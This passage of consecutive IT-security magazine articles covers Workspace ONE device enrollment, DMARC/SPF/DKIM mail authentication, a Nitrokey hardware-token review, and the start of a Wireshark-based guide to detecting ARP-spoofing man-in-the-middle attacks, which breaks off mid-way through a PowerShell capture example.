From a web-based HTML5 management console, you can control Workspace ONE UEM. All data transferred between the web console and mobile devices is encrypted. To ensure the environment meets the latest security standards, the cloud-based Workspace ONE components automatically update and patch themselves.

The approach to data center security is multilayered. Primary data centers have onsite backups for rapid recovery and replicated offsite backups for disaster recovery. Production systems are hosted in two primary data centers, with cross-site replication of nightly backups to support performance, growth, and security requirements.

Self-Enrollment of Private Devices

Finally, I look at self-enrollment as one of the many options for registering a device in Workspace ONE. For an iPhone, for example, you need to install the Intelligent Hub application from the App Store for the target device. To establish a connection from the target device to the UEM, the server address and the respective group ID must be entered. After entering and establishing the connection, the user logs in with credentials provided by the enterprise. The successful login is followed by a manual installation routine, which is used to complete mobile device management registration.

The previous steps are virtually the same for Android devices, the difference being that they can be used after a successful connection. That is, you can make the resources available to the user, and the user can access the deployed applications within the Intelligent Hub catalog.

Unlike Android devices, however, Apple devices require an additional step before going live: an installation of one or more profiles. Once installed and connected to the Workspace ONE server, a window opens in the application asking you to create a profile. This step takes place outside of Workspace ONE, in the settings of the Apple device. After successfully creating a profile, the device is finally registered, and the user can access the application provided on the Intelligent Hub catalog. Likewise, you can view the registered device from the UEM platform and manage it as needed.

At all times you have the option to de-register the registered devices with what is known as an "enterprise wipe," which deletes the changes made to the device by Workspace ONE. Another action is known as a "device wipe," which resets the device back to the factory settings and deletes all data.

Conclusions

Thanks to Workspace ONE UEM, enterprises can easily integrate a fleet of mobile devices. Additionally, Workspace ONE Access enables the implementation of corporate policies and the unified deployment of applications. Other access components, such as the Airwatch Cloud Connector (ACC), support the integration of local and cloud-based LDAP directories. Workspace ONE can therefore be seen as a comprehensive tool for centralized and uniform management of end devices and mobile work.

Info

[1] VMware Workspace ONE: https://www.vmware.com/products/workspace-one.html
[2] Workspace ONE Access: https://techzone.vmware.com/resource/business-continuity-vmware-solutions-remote-work#existing-workspace-one-uem-and-access
[3] Cloud-based logical architecture: https://techzone.vmware.com/resource/vmware-workspace-one-and-horizon-reference-architecture-overview#cloud-based-logical-architecture

S EC U R I T Y DMARC

Secure email communication

Trustworthy
DMARC combines the abilities of SPF and DKIM to safeguard and protect against spam and phishing and allows
targeted configuration according to company policy. By Matthias Wübbeling

(Photo by Simon Moog on Unsplash)

IT administrators, no matter their level of experience, agree that managing mail servers is one of the supreme disciplines. Too many fragile system settings, too many pitfalls, and above all, public pillories in the form of blacklists if something goes wrong during configuration. All the more respect goes to the admins who successfully manage mail servers, keep them permanently available, and ensure that outgoing email reaches the intended recipient reliably.

Microsoft in particular and the email service providers it controls are considered particularly strict when it comes to accepting messages from third-party servers. Although some people claim that Microsoft deliberately filters third-party providers to boost the number of customers for its own services, this prejudice cannot be confirmed on closer inspection. Microsoft offers comprehensive information about blocked mail servers and recommendations for action on a website set up specifically for this purpose [1]. If you have your mail server under strict control, you do not need to worry about problems with delivery to Live, Hotmail, or Outlook servers.

In this article, I look at how to secure email with the Domain-based Message Authentication, Reporting, and Conformance (DMARC) email authentication protocol.

Secure Mail Dispatch

Even though spam filtering and malware detection when receiving email play a major role in corporate security, in this article I only look at how to secure email transmission. Of course, the measures I will be looking at also indirectly contribute to the security of enterprise email accounts, as long as the other mail servers also use them. Because fake senders can be blocked even before email is received, the incoming spam volume is automatically reduced. The integration of the corresponding checks on receiving mail servers is described in the documentation for the Exim and Postfix mail transfer agents.

Probably the most important step is to set up a Sender Policy Framework (SPF) record in the domain name system (DNS) that lets admins specify authorized outbound mail servers. Although designed in 2004, SPF only became the standard recommended by the Internet Engineering Task Force (IETF) in 2014 [2]. From a sample of more than 3,000 domains belonging to German companies, I examined the DNS records and determined the number of valid SPF records. About 25 percent of these domains do not have an SPF record stored, which


means that recipients cannot check whether the delivering mail server is allowed to send messages for the sender domain.

This situation opens the door for phishing and CEO fraud; therefore, you should get an overview of your company’s sending mail servers and enter them in an SPF record in the DNS. If you can’t easily determine this list, at least limit sending to your company’s subnets and contracted mail sending service providers. Taking this step is still better than having no SPF entry at all. Note that the record must be published for the domain that is used as the domain part of the email address, not for the hostname of the (incoming) mail server. Strictly speaking, SPF is evaluated against the domain of the envelope sender (the SMTP MAIL FROM address, which recipients later see as Return-Path), not against the From: header that the user sees; the two are only tied together by the DMARC alignment check described below.

Signatures with DKIM

DomainKeys Identified Mail (DKIM) [3] lets a mail server sign outgoing email with a private key. The matching public key is published in the sending domain’s DNS. Here, too, the entry must be created for the domain part of the email address. In contrast to SPF, however, multiple keys with different selectors can be managed, which results in DNS entries for different subdomains below _domainkey. For a selector with the name admin-mag, the appropriate DNS entry would be created at admin-mag._domainkey.admin-magazine.com. The selector (s=) and the signing domain (d=) are included in the DKIM-Signature header of the email so that the receiving mail server can look up the correct public key. Because the selector can vary from server to server, and the recommendation is even to rotate it regularly, it is not possible to make a comprehensive statement about the implementation of DKIM on the Internet within the scope of this article. As a lower bound, however, it can at least be stated that around 13 percent of the domains tested have published a key under one of the standard selectors from the documentation and tutorials. Whether these domains actually sign their outbound messages cannot be determined from DNS alone; only a received message shows whether it carries a signature.

Guidelines with DMARC

SPF records come with instructions on how to deal with senders not listed in the record, but email without a DKIM signature should not be rejected without further ado, because a missing signature may simply mean that the sending domain does not use DKIM. Because of the different selectors, no single DNS entry exists that a recipient could query to learn whether a domain signs at all.

DMARC closes this gap. In a TXT record at _dmarc.<domain>, you publish a policy for all messages whose From: header carries your domain. A message passes DMARC if at least one of SPF or DKIM passes and the domain that passed aligns with the From: domain; for DKIM this works independently of specific selectors, because the verifier takes the selector from the signature itself. With the policy tag (p=none, p=quarantine, or p=reject) you determine whether email that fails this check is merely reported on, quarantined, or rejected outright by the recipient.

Additionally, the pct tag specifies the percentage of failing messages to which the policy is applied; the remainder receives the next milder treatment. This is meant for a staged rollout, and to be on the safe side you should, of course, end up at 100 percent. In the implementation phase, but also permanently for information purposes, you can store URIs to which reports of the DMARC checks are sent: rua= for aggregate (summary) reports and ruf= for failure (forensic) reports. You also need to ensure that you can receive and process the reports, which the various mail servers send once or several times a day.

To receive the reports by email, enter a mailto URI with your email address. However, make sure the address belongs to the domain being checked; otherwise, other mail servers will initially refuse to send the statistics for security reasons, because a policy could otherwise flood an arbitrary third party with reports. If you want reports delivered to another domain (for example, to a reporting service), that domain must publish an authorization record at <yourdomain>._report._dmarc.<reportdomain> containing v=DMARC1; receivers check for this entry before sending.

Silent Mail with SRS

Another aspect of mail server operation – especially if you maintain mailing lists or allow forwarding to external email addresses – is the Sender Rewriting Scheme (SRS). Suppose you set up forwarding of an email address, as in [email protected], to external recipients. Your incoming mail server then becomes a relay for external senders and sends email on their behalf to all recipients specified in the forwarding list. This is also how mailing lists, such as those run by the popular Mailman software [4], work by default.

The mail servers of these recipients should reject the messages from your server, because your mail server is probably not listed in the SPF record of the original sender’s domain. What helps in this case is to set up an SRS service on the mail server that rewrites the envelope sender of forwarded email to a temporarily valid address in your own domain, of the form SRS0=<hash>=<timestamp>=<original domain>=<original local part>@yourdomain. The address encodes the original sender together with a timestamp and a keyed hash, so that bounces to it can be verified, unpacked, and returned to the original sender, while forged or expired SRS addresses are dropped. With this new sender address, the email then passes the SPF check – your server is listed in the SPF record of your own domain – and can be forwarded successfully. Note that SRS repairs SPF only: if the original sender’s domain publishes a DMARC policy, the forwarded message still has to carry an intact DKIM signature from that domain to pass alignment, so a forwarder must not modify the signed headers or body.

Conclusions

For the secure use of email as a medium, servers also need to be configured comprehensively to check outgoing messages. The configuration itself is not at all complicated and can be implemented for most mail servers in just a few hours. As an administrator, you can prevent third-party mail servers from sending email on behalf of your own domain and causing damage.

If you consistently use the techniques presented here, you can secure your mail server against this scenario, which means you also can reliably send messages from your own mail server to the particularly restrictive mail servers of large enterprises, such as Microsoft or Google.

Info
[1] Outlook page on outbound mail problems: https://sendersupport.olc.protection.outlook.com/pm/troubleshooting.aspx
[2] RFC 7208 on SPF: https://www.rfc-editor.org/rfc/rfc7208.txt
[3] RFC 4870 (DomainKeys, the predecessor of DKIM; DKIM signatures themselves are specified in RFC 6376): https://www.rfc-editor.org/rfc/rfc4870.txt
[4] Mailman: https://list.org

SECURITY | Nitrokey

Hardware-enhanced security

Key to Security

Nitrokey hardware authentication devices aim to raise data encryption, key management, and user authentication security to the next level. By Rubén Llorente
Consumer-grade security implemented by software is cost effective for most users, who may install and run password managers, encryption tools, and other privacy programs for virtually no cost; however, software comes with limitations.

Most users can live with these limitations, but if you are exceptionally conscious of your privacy or handle top secret data, you do not want to take any chances. Thankfully, you have alternatives to running your security applications in software only: Nitrokey.

Enter the Key

Nitrokey GmbH [1] is a German hardware company focused on security products. Its main product line is a variety of Nitrokeys, which are hardware authentication tokens in the form of pen-drive-sized units that connect to your computer or server over the universal serial bus (USB). The manufacturer offers a whole range of models with different capabilities, with prices ranging from EUR29 to 109 (VAT not included; or about $25–$88). They also produce a line of Qubes OS-certified laptops and Nextcloud appliances and provide a free Matrix instance for those who want a secure chat platform.

The Nitrokey website claims that its hardware can be used to enhance the security of certain web logins, email encryption, hard disk encryption, and SSH access. Whether this is true, and whether a Nitrokey is worth the cost, is what I intend to determine in this article.

I am reviewing the Nitrokey Storage 2, the most featureful Nitrokey available. For EUR109 plus taxes and shipping, you get a Nitrokey with 16GB of encrypted, tamper-resistant storage, a password manager, and a sticker (Figure 1). What it lacks is a manual, which is disappointing. For the price, they should have included at least a quickstart guide. Instead, a label in the packaging instructs you to check the online documentation [2] for instructions.

The Nitrokey looks solid enough, but I have seen Kingston pen drives that

Figure 1: A Nitrokey Storage 2 comes with a keychain hole and a sticker but no instruction manual.

(Lead Image © Jeff Metzger, 123RF.com)


looked hardier. The cap that covers the USB plug might be easy to lose because you don’t have a way to attach it to the body of the Nitrokey while the device is in use.

Getting Started

Your computer will need a software application to interface with the Nitrokey. Thankfully, you are provided a free, open source program [3] that supports FreeBSD, macOS, Windows, and many Linux distributions. AppImages, Flatpaks, and Snaps are also available. Nitrokeys appear to be partially supported on Android smartphones over USB On-the-Go (OTG) [4], although it would require an adapter (Figure 2). In any case, Android is not listed as an officially supported platform.

For testing, I decided to use Knoppix 9.1. The software necessary to initialize a new Nitrokey can be installed by issuing the commands:

sudo apt update
sudo apt install nitrokey-app

The Nitrokey App ends up under the Accessories category of the Start menu, from which the program may be launched and the Nitrokey plugged in for initialization. The documentation instructs you to change the default user and admin PINs and then load either OpenPGP or S/MIME keys into the Nitrokey (see the “What is OpenPGP?” box). The steps for changing the PINs are very intuitive (Figure 3), but key initialization is not. Change both PINs before doing anything else: the factory defaults are public knowledge, and the retry counter for each PIN is small (three attempts on an OpenPGP card), so a token left with default PINs is protected by nothing at all.

I decided to generate an OpenPGP set of keys for testing, but the steps suggested by the documentation failed to function. As an alternative, I issued the commands

$ gpg --card-edit
gpg/card> admin
gpg/card> generate

to start an interactive menu (Figure 4) from which I could generate a set of keys. During generation, gpg asks whether to make an off-card backup of the encryption key; if you decline, a lost or broken token takes with it the ability to decrypt everything that was encrypted to that key. The strength of this method is that the keys are generated by an internal Nitrokey chip and are never accessible to the operating system. Therefore, the private keys cannot be retrieved by any means, even if the operating system is compromised. The Nitrokey boasts tamper-resistant storage, which in theory makes it impossible to access the private keys by prying the Nitrokey open.

Although not emphasized in the documentation, it is very important that the public keys are exported right away, using

gpg --armor --export <yourID> > key.asc

because they must be imported manually on every other computer on which you intend to use the Nitrokey. The pen drive is not capable of generating them on its own. If the computer on which you generated the keys is lost (which actually happened during my tests) and you have no copy of the public keys, the keys in the Nitrokey will be, for all intents and purposes, unusable, and you will need to generate new ones.

GNU Privacy Guard (GPG) or software that leverages GPG for encryption (e.g., Pass or Mutt) can then use the Nitrokey for decrypting sensitive data with an additional layer of protection. Because the private keys can never leave the Nitrokey, GPG sends any material that needs to be processed by the private key (e.g., an encrypted message) into the Nitrokey

What is OpenPGP?

OpenPGP [5] is a standard for encrypting messages, particularly email. The theory behind it is complex, but in essence, each user creates a private key and a public key, which are big chunks of cryptographic material. Briefly, encryption uses the public key and signing uses the private key, whereas decryption uses the private key and signature verification uses the public key. When you want to receive encrypted email, you place your private key in a safe place (e.g., a Nitrokey) and give a copy of the public key to each person from whom you want to receive encrypted email.

Despite being regarded primarily as an email encryption protocol – it is commonly integrated with email clients, such as Thunderbird or Claws Mail, to perform encryption and decryption automatically – OpenPGP has many other applications. For example, the Pass password manager uses OpenPGP to store passwords in encrypted form.

Figure 2: An inexpensive OTG adapter would let you use a Nitrokey with an Android phone.

Figure 3: The default PINs are easily guessable and must be changed from the systray applet.


itself, which returns the processed data back to GPG (in my example, a stream of unencrypted data).

Therefore, for performing tasks like decrypting OpenPGP messages addressed to a given user, both the Nitrokey and the PIN used to unlock it must be under the control of the person performing the decryption. If the Nitrokey is not plugged in, it is impossible to decrypt any message addressed to the user. Should the Nitrokey be stolen, the keys within it will be useless to the thief because they can only be used by the person who knows the PIN. The Nitrokey provides a limited number of attempts for guessing the PIN: Once the limit is reached, the keys become unavailable.

The advantages of using a Nitrokey for storing OpenPGP keys are, thus, substantial.

Protected Computer Login

Nitrokeys may be used as login tokens on distributions that authenticate through Pluggable Authentication Modules (PAM). You may, for example, configure your operating system to allow only you to log in if you plug in a Nitrokey that contains your set of keys. Once this is done, only a person controlling both the Nitrokey and its PIN may log in, invoke sudo, or unlock the screensaver. This method is a big upgrade from regular password protection because obtaining the password is no longer enough for the attacker.

The steps for using the Nitrokey in such a way are documented [6], but setting up the configuration involves messing with PAM configuration files and carries the possibility of breaking your operating system and rendering it unusable. Additionally, the documentation is not very helpful.

I used Ubuntu 21.04 to test the Nitrokey as a login token. The first step was to install poldi, which is a PAM module designed to work with OpenPGP tokens:

sudo apt-get install libpam-poldi

Next, you need to obtain the application ID of the Nitrokey. After plugging it in, issue the command

gpg --card-status | grep Application

to see the identifier (e.g., D00600012401020000000000xxxxxxxx).

Now, poldi must be informed that it is supposed to manage the authentication of the system user. For example, if your login name is linux, you would place the following line in /etc/poldi/localdb/users:

$application_identifier linux

and replace $application_identifier with the string you got in the previous step. This operation requires root privileges.

The last part is dangerous; mistakes may render your operating system unusable, so ensure you have a rescue CD around just in case you break something. You must modify PAM to accept the Nitrokey. The easiest way to do this in Ubuntu 21.04 is to open the file /etc/pam.d/common-auth and replace the line

auth [success=2 default=ignore] pam_unix.so nullok_secure

with the line:

auth [success=2 default=ignore] pam_poldi.so

Before you log out, keep a second terminal open as root and verify from a fresh login (or with sudo -k followed by sudo true) that the token is accepted: the replacement removes password authentication entirely, so a lost or broken token otherwise locks you out until you boot the rescue medium.

From now on, you will need to plug the Nitrokey into a USB port and enter the PIN for logging in to a graphical session, unlocking the screensaver, or even invoking sudo. The bad news is that integration seems a bit rough around the edges. For example, the appearance of the Gnome display manager (GDM) is slightly mangled when asking for the Nitrokey PIN instead of a user-password combination.

One must wonder whether going through this hassle is worth the trouble. It certainly works as advertised, but the only threat this setup protects against is hardware keyloggers intended to steal your login password, because the person who planted the keylogger will need your Nitrokey to log in, even if your PIN is discovered. It is a neat concept but not extremely useful. Somebody capable of planting a keylogger to steal your password probably can boot the computer with a Live CD while nobody is watching to perform all sorts of horrible deeds without your credentials.

Password Management

The Nitrokey Storage 2 comes with an integrated password manager. You may use your Nitrokey alongside the Nitrokey App to store your passwords

Figure 4: The steps described by the official documentation didn’t work, but gpg --card-edit made it possible to generate a set of OpenPGP keys on the Nitrokey.


within the Nitrokey’s secure storage. The passwords stored in such a way will only be accessible by using the correct PIN (Figure 5).

The main limitation of the integrated password manager is that it has room for only 16 passwords. My personal collection of passwords has more than 150 entries in it, so the Nitrokey falls short. Moreover, the integrated password manager does not offer a high level of protection because it does not conceal the passwords themselves from the operating system as well as it does with private OpenPGP keys.

The Pass password manager can take advantage of the Nitrokey and be configured to use the keys stored within to manage stored credentials. The Nitrokey must be plugged in and the PIN entered to access the passwords managed by Pass. The documentation also points out that KeePass can be configured in a similar way [7].

One-Time Passwords

Although the Nitrokey is not much better than a software password manager, it hides an ace up its sleeve: one-time passwords (OTPs), which are useful for services that support two-factor authentication (2FA). Websites that support OTP-based 2FA work by generating an OTP secret key, which you must store in a secure device (e.g., the Nitrokey); then, each time you attempt to access the website, it asks for both your regular password and a one-time password (Figure 6).

One-time passwords are strings generated as a function of the OTP secret and a predictable factor (e.g., the current time, or a counter that both sides increment). The user is expected to use the Nitrokey to generate a one-time password, which will only be valid for a short amount of time (typically less than a minute), that the website will recognize.

One-time passwords are very strong because a sniffed code is useless for replay. They are ephemeral, and a given OTP will never be accepted again. What they do not prevent is a real-time phishing proxy that relays your code to the genuine site within its validity window; only authentication bound to the site’s origin, such as FIDO2/WebAuthn, stops that. To break 2FA, an attacker would need both your regular password and your OTP secret. Because the OTP secret resides only within the Nitrokey (and, of course, on the website’s server, which is why a breach there exposes it as well), the attacker would need to get the Nitrokey itself and the PIN to access the OTP secret and generate one-time passwords that a website will recognize as yours.

Breaking 2FA is not trivial. Then again, the Nitrokey represents a massive step up from regular password authentication. However, a multitude of free software implementations exist for OTP. Most users of OTP-based 2FA just install an application such as mobile OTP (mOTP) on their smartphones for the same effect. Although it might be argued that a smartphone is less secure than the Nitrokey, because a smartphone can suffer malware attacks more easily than a Nitrokey, I am not convinced the security gain is high enough to justify the

Figure 5: The User PIN may be used to retrieve a password stored within the Nitrokey. The drawback of this approach is that, once the Nitrokey gives the password over to the operating system, it could be stolen if the operating system is compromised.

Figure 6: The Nitrokey adds security to certain web accounts by enabling 2FA. Once enabled, 2FA requires the appropriate Nitrokey and the password for logging in.


expense. (See the “Why Not 2FA?” box.)

Encrypted File Storage

The Nitrokey Storage 2 works as an encrypted pen drive. Files stored within the Nitrokey Storage 2 unit won’t be accessible unless the correct PIN is entered – and the number of tries is limited to protect your data against theft. The Nitrokey is much safer than a regular pen drive for storing sensitive files.

Most home users who want to encrypt the content of their USB drives opt for software solutions such as VeraCrypt or dm-crypt, which are free of cost, quite convenient, and very safe. The drawback to these tools is that they are vulnerable to keyloggers and malware: If you enter a VeraCrypt password on a computer that has a keylogger reporting your activity to an evil entity, your security will be broken. The Nitrokey fails to counter this vulnerability because a PIN can be sniffed as easily as a regular password. Although the feature worked as intended during my tests, I think it does not add much security in this regard.

On the other hand, hidden volumes are supported (see the systray applet menu in Figure 3). Hidden volumes are concealed filesystems that provide plausible deniability, whose existence cannot be proven, and are hidden within the regular encrypted storage. (See the “Is Plausible Deniability Safe?” box.) The intention is for the user to have innocuous files in the regular encrypted storage and the top secret data kept within a hidden volume. Were the Nitrokey to be stolen and its owner captured and tortured for the password, the user could provide the PIN for the regular encrypted storage and convince the captors that its contents are the only thing stored in the encrypted vault. The hidden data would remain concealed and thus safe.

Live DVDs and Sensitive Secrets

Modern operating systems are quite messy when it comes to handling secret files. When you open a file with a program, there is always the chance that the program will put pieces of the file in caches, temporary folders, or even the swap partition. When working with a secret file, this is problematic.

If you mount an encrypted volume in a directory and open one of its files (e.g., with LibreOffice), pieces of the file might end up in unencrypted places on the hard drive. At the very least, the path of the file would be added to the Recent Documents list, which is easily retrievable and therefore vulnerable.

Live DVDs are thus a great tool for working with sensitive files: You can load the Live operating system and mount the encrypted volume

Why Not 2FA?

Two-factor authentication is great when it works, but my experience is that it is awful when it doesn’t.

I have seen some forums, cryptocoin exchanges, and businesses implement 2FA because of the security gain. Somebody who has 2FA enabled won’t have their account compromised unless both the password and the OTP device (Nitrokey, smartphone, or similar token) are compromised. However, small sites short of personnel tend to crumble under an avalanche of support requests from users soon after 2FA is implemented.

The reason is that if the device that contains the OTP secret is lost, the user can no longer access the service. Most users don’t make backups of their OTP secret, which means most users will eventually lose it and send a support request to the website operator.

On serious websites there is no such thing as an automated 2FA reset. The banks I work with will have the user walk into an office to prove their identity before access is restored. After all, if something is valuable enough to protect with 2FA, it is probably too valuable to consider sending a reset link to an email address. Email accounts are usually protected by a traditional password: If your bank was willing to send you a credentials reset link by email, an attacker would only need to break into your email account (which is protected by a single factor of authentication) and request a reset from the bank. This would downgrade 2FA to “1FA” and render the whole system pointless.

Therefore, users who want to protect their digital life ought to make a backup of their 2FA device, and administrators of sites that want to deploy this technology need to be aware of the costs. The resources to be spent in a user support department will probably increase more than expected.

Is Plausible Deniability Safe?

The main problem with plausible deniability is that, although it is impossible to prove the existence of hidden information within the device, it is impossible (in practice) to prove that a hidden volume does not exist.

Imagine a terrorist organization steals your Nitrokey and kidnaps your hamster. When they phone you and tell you they are going to torture your hamster until you reveal the password of the hidden volume, if the Nitrokey does not have a hidden volume, the terrorists will torture your hamster forever because they have no way of knowing whether it has concealed data or you are lying.

Even if you reveal the password of a hidden volume, the terrorists will threaten to keep torturing your hamster unless you reveal the password of the hidden volume stored within the hidden volume. (Yes, some cryptosystems can stack multiple hidden volumes.)

Game theory, then, suggests that plausible deniability might be a liability (assuming you care for your hamster) because your enemies have no reason to stop pressing on. The possibility always exists that more information is hidden that you don’t want to reveal, so the incentive is to keep torturing your hamster. Meanwhile, your best alternative is not to reveal the passphrase because you know they are not going to stop the torture, no matter what you give them.

One idea is that plausible deniability systems of this sort are extremely valuable to the owner of the data as long as that owner is not the person who has the passphrases. For example, if you are an executive and you hand a Nitrokey to your assistant to store some top secret files on it, you may rest assured she won’t reveal the password of the Nitrokey, even if they threaten to torture her hamster. She would know that talking would not save her pet.


within it. Once you are finished working with the encrypted files, turning the computer off erases any trace of activity from the machine, provided the Live system runs entirely from RAM and does not activate an existing swap partition or a persistence area on the local disk. Should the computer be stolen, the thief would not be able to retrieve the information.

Conclusions

Although encrypted storage worked well in the tests, it is arguably the most expensive feature the Nitrokey has to offer. The price difference between the Nitrokey Storage 2 and the Nitrokey Pro 2 is EUR60 (VAT excluded), and the only meaningful feature the latter lacks in comparison is encrypted storage. Software implementations that offer similar features, including hidden volumes, cost nothing.

The main advantage the Nitrokey Storage 2 has over software implementations is that the number of times an attacker can try a PIN is limited by the hardware chip, so in theory, the Nitrokey is much safer because it cannot be brute forced. However, the equivalent software implementations are considered unbreakable in practice, as long as good passphrases are used. The increase in security brought by the Nitrokey is significant, but whether a home user can justify the expense is a different question.

The Nitrokey Storage 2 works as advertised for the most part. Keeping a set of OpenPGP keys within a Nitrokey is just safer than storing them on your hard drive, as is the usual practice. The hardware-enhanced encrypted storage is a good upgrade from common software encryption tools, as long as the files to be protected are important enough to justify the expense.

Its password management capabilities, alongside its ability to function with 2FA, are quite handy, but they don’t add much security when compared with software solutions.

The Nitrokey is a portable solution that might help you move files between a heterogeneous group of computers. A cool feature of the Nitrokey Storage 2 is that it includes a nonencrypted partition that can be set as read-only. Out of the factory, it comes with a version of the Nitrokey App for Windows, Linux, and macOS, which is convenient for using the Nitrokey on computers without an Internet connection or that don’t make it easy to install third-party software.

Finally, the Nitrokey is partially supported under Android. The only feature that works on such a platform, through the OpenKeychain application, is the smartcard functionality for managing OpenPGP keys, which means no encrypted data storage or password management on Android. However, email signing and encryption-decryption are available.

The list of functions Nitrokeys [8] can address is amazing. In addition to the features described in this article, the Nitrokey Storage 2 can be used as an SSH authentication token, perform certificate-based authentication with websites, or authenticate into virtual private networks (VPNs). The documentation is barely sufficient, though, and although hobbyists might benefit from using the Nitrokey, leveraging the full power of this device is only within the reach of power users and professionals.

Info
[1] Nitrokey: https://www.nitrokey.com/
[2] Docs: https://www.nitrokey.com/start
[3] Platform support: https://www.nitrokey.com/download
[4] Nitrokey on Android: https://www.nitrokey.com/news/2017/using-nitrokey-android-phones
[5] OpenPGP: https://www.openpgp.org/
[6] Nitrokeys for computer login: https://www.nitrokey.com/documentation/applications#computer-login
[7] Pairing with KeePass: https://www.nitrokey.com/documentation/applications#password-manager
[8] Documented applications: https://www.nitrokey.com/documentation/applications

The Author
Rubén Llorente is a mechanical engineer whose job is to ensure that the security measures of the IT infrastructure of a small clinic are both legally compliant and safe. He is also an OpenBSD enthusiast and a weapons collector.

SECURITY MITM Analysis

Detecting and analyzing man-in-the-middle attacks

Cuckoo's Egg

Wireshark and a combination of tools comprehensively analyze your security architecture. By Thomas Joos

In man-in-the-middle (MITM) attacks, attackers place themselves between the victim and the targeted resources, putting them in a position to intercept, read, and possibly even manipulate communications. In doing so, the attacker does not have to redirect the traffic completely or impersonate the data target. Instead, they can sniff the data on the network and then let it continue to the intended target without interference. In other words, the attacker is in the middle of the data flow.

As a result, many users and administrators do not identify these attacks until it is too late, because in most cases, network services are not disrupted by the attack. Services continue to run normally while the attacker accesses the traffic between the client and the server. Identity theft, faked transactions, or stealing intellectual property are just a few possible results. These attacks can just as easily be performed on cable-based networks as on WiFi, although they are particularly common on WiFi networks because public WiFi is often virtually unprotected.

Before I look at possible defense mechanisms and tools such as Wireshark, I'll first look into how an MITM attack takes place, with techniques such as Address Resolution Protocol (ARP) poisoning, and how you can detect and analyze attacks, which in turn can help you protect your own network against MITM attacks and optimize your internal security structure accordingly.

ARP Gateway

MITM attacks on a local network often rely on the ARP cache, the local table of IP-to-MAC address assignments that every host maintains. Its content can be displayed at the Windows command line by typing

arp -a

(Figure 1). On Linux computers

ip n s

(short for ip neighbour show) does the same thing. This information can help detect MITM attacks because the output shows whether one MAC address is stored on a computer for two or more different IP addresses, for example for both the default gateway and another host, which is a typical sign of ARP spoofing.

However, an attacker can also read and manipulate this data, because ARP has no authentication and the cache has no protection: any host on the segment can answer an ARP request, or send unsolicited replies, and the receiving host updates its cache accordingly. Anyone can therefore view and change the IP-to-MAC assignments and use them for attacks.

The example of ARP spoofing used here plays out as follows: PC1 belongs to the victim. It receives ARP responses from the attacker's PC, which pretends to be the router with the route to the Internet. As a result, PC1 sends its Internet-bound traffic to the attacker's PC, which forwards it to the real router and vice versa. At the same time, the router receives ARP responses from the attacker impersonating PC1, which results in all traffic intended for PC1 reaching the attacker's PC, which redirects it to PC1.

Figure 1: The ARP cache can be displayed from the Windows command line.

Photo by Soner Eker on Unsplash

The attacker can now view and modify all the packets received. If the data traffic is not encrypted, intruders can grab login data for HTTP websites or the content of documents with this approach. Additionally, DNS spoofing, phishing, keylogging, and many other attacks are possible in this way.

End-to-end encryption does not stop ARP spoofing itself, but it is the best way of neutralizing the MITM attacks built on it: if all the data traffic between the devices involved is encrypted and authenticated, attackers can relay the intercepted data but cannot read or alter it. End-to-end encryption is made possible by the use of protocols such as HTTPS, POP3S, or IMAP4S, provided the clients actually verify the server certificates instead of clicking through warnings. Managed switches also offer the option of preventing the spoofing itself, although the security function first needs to be enabled on the switch. On Cisco switches, for example, this function is known as Dynamic ARP Inspection (DAI); it validates ARP packets against the DHCP snooping binding table and drops replies that do not match.

Setting up Wireshark

Wireshark [1] sits on the network like an MITM attacker and captures data traffic, allowing you to detect patterns that could indicate an MITM attack. However, Wireshark is also frequently used by attackers because it analyzes network packets unobtrusively. If an intruder uses ARP spoofing to route packets to their own computer, Wireshark can analyze the packets in the same way, and you can detect these packets on the network. In other words, Wireshark can help you carry out, prevent, or log MITM attacks.

On Linux, the libpcap library is a prerequisite for using Wireshark. An installation on Windows 10 or 11 is possible, as well. As part of the installation, Wireshark can install the latest version of Npcap. On Windows, Npcap or WinPcap has to be in place to capture live network traffic. Wireshark ships with Npcap as of version 3.x; the older versions use WinPcap. On Windows 10/11 and Windows Server 2016/2019, Npcap is better suited for analyzing data on the network in combination with Wireshark.

After starting Wireshark, the first step is to prepare the program for the test (as is true for other tasks you perform with Wireshark, not just for analyzing MITM attacks). The most important functions can be found in Capture | Options. Clicking the Manage Interfaces button opens a dialog with the local interfaces that you can use for monitoring. The Input tab provides the network interfaces that Wireshark uses for sniffing.

Equally important is Edit | Preferences | Capture, which is where you select the default network interface you want Wireshark to monitor. The Update list of packets in real time and Automatic scrolling in live capture options ensure that the currently captured packets are always displayed in the window. The Name Resolution section of the Preferences dialog is also important. You will want to enable the Resolve network (IP) addresses option. Wireshark will then attempt to display the names of the devices for the IP addresses it shows.

It is crucial to enable promiscuous mode to ensure that Wireshark records all packets that reach the network interface, and not just those addressed to its own host system. The corresponding settings are also available under Capture | Options, where promiscuous mode is normally enabled, unless you have disabled it. Keep in mind that on a switched network, promiscuous mode only reveals the traffic the switch forwards to your port (broadcasts, including ARP, plus your own unicast traffic); to see the traffic between two other hosts, you either capture on one of them or on the attacker's machine, as in the test below, or use a mirror (SPAN) port on the switch.

On the Output tab, you can specify the file in which Wireshark will save the capture. To ensure that the files do not fill up your whole disk, you can enable automatic overwriting of older files with Use a ring buffer with n files. Saving the captures makes it easier to analyze MITM attacks later, but it does not stop you capturing the attacks during live analysis.

Figure 2: Wireshark can sniff data packets on the network to detect and carry out man-in-the-middle attacks.
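The capture settings above (promiscuous mode, a ring buffer of n files, saving to disk) can also be set from the command line with dumpcap, the capture engine that is installed together with Wireshark, which is handy for an unattended capture on the victim or the test machine. The following PowerShell functions are an added example and not part of the article: they build the dumpcap argument list and start a detached capture. The Wireshark install path, the interface name Ethernet, the output folder C:\captures, and the capture filter are assumptions; the argument-building function runs anywhere, the start function needs Wireshark installed and normally an elevated shell.

```powershell
# Added example: unattended ring-buffer capture with dumpcap (ships with Wireshark).
# Assumptions: default install path on Windows, an interface named "Ethernet"
# (list yours with 'dumpcap -D'), and an existing C:\captures folder.

function Get-DumpcapArgumentList {
    param(
        [Parameter(Mandatory)] [string] $Interface,        # name or index from 'dumpcap -D'
        [Parameter(Mandatory)] [string] $OutFile,          # dumpcap appends a number and timestamp
        [ValidateRange(2, 1000)] [int] $RingFiles = 10,    # overwrite the oldest after n files
        [ValidateRange(1, 2147483647)] [int] $FileSizeKB = 102400,   # roll over at 100 MB
        [string] $CaptureFilter = '',                      # BPF syntax, e.g. 'arp' or 'arp or port 445'
        [switch] $NoPromiscuous                            # -p switches promiscuous mode OFF
    )
    # "-b filesize:<KB> -b files:<n>" is the command-line form of the GUI option
    # "Use a ring buffer with n files"; promiscuous mode is dumpcap's default.
    $argList = @('-i', $Interface, '-w', $OutFile,
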